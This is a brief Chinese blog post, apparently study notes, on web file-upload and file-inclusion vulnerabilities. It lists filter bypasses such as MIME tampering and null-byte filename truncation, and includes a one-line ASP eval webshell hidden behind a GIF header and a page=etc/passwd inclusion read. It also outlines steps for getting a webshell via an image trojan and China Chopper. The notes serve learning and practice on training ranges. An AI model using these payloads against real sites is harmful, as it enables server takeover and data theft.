web安全之文件上传漏洞、文件包含漏洞

文件上传

原理:对上传的文件未进行过滤,或者过滤不严,导致恶意文件被成功上传到网站。

防御:代码加强、WAF拦截、webshell查杀、正则搜索网站目录是否存在eval等敏感字段。

前端JS绕过

更改前端限制

burp抓包

MIME绕过

content-type篡改

 

 

文件上传练习靶场

uploadlabs

下载地址:

参考资料:

https://blog.csdn.net/weixin_47306547/article/details/120043032

https://www.cnblogs.com/chu-jian/p/15515770.html

 

漏洞利用

文件头欺骗    gif89a <% eval request("pwd")%>fuckfuckfuckfuckfuck    
filepath                                就是IIS 6.0的目录解析漏洞。
Filename(00截断)      上传图片马c.jpg——抓包改成filename=c.php jpg——空格替换成Hex    
                                     上传图片马c.jpg——抓包改成filename=c.php%00jpg——将%00URL编码    
filetype        篡改文件类型:修改mime类型   类型/子类型   Content-Type
强行添加表单提交按钮       <input type="submit" value="提交" name="bb">

 

文件包含

原理

.py文件中包含.py文件,一种常用的开发机制。对所包含的内容未进行过滤,或者过滤不严,导致恶意文件被成功执行(直接getshell)。
分类:本地文件包含、远程文件包含。 
形式:page=etc/passwd、page=”url”
代码注入的一种,核心原理是黑客拥有变量的控制权。
文件包含漏洞可引发文件上传漏洞、命令执行漏洞。

PHP/JSP/ASP相关函数一览表

  • PHP配置文件中的参数:

allow_url_include选项    定义本地文件包含开关
allow_url_fopen选项     定义远程文件包含开关

  • JSP配置文件中的参数:
  • ASP配置文件中的参数:

利用

图片马如何获取webshell?(使用图片马利用文件包含漏洞,获取webshell)

  • 使用图片马工具edjpgcom将恶意代码插入图片中
  • 上传
  • 访问url?page=图片相对路径或者远程url/一句话木马.txt以执行该文件
  • 即可生成一句话木马文件
  • 中国菜刀连接

日志文件包含利用

攻击绕过:绕过过滤函数。

 

posted @ 2023-05-25 15:58  dustfree  阅读(59)  评论(0编辑  收藏  举报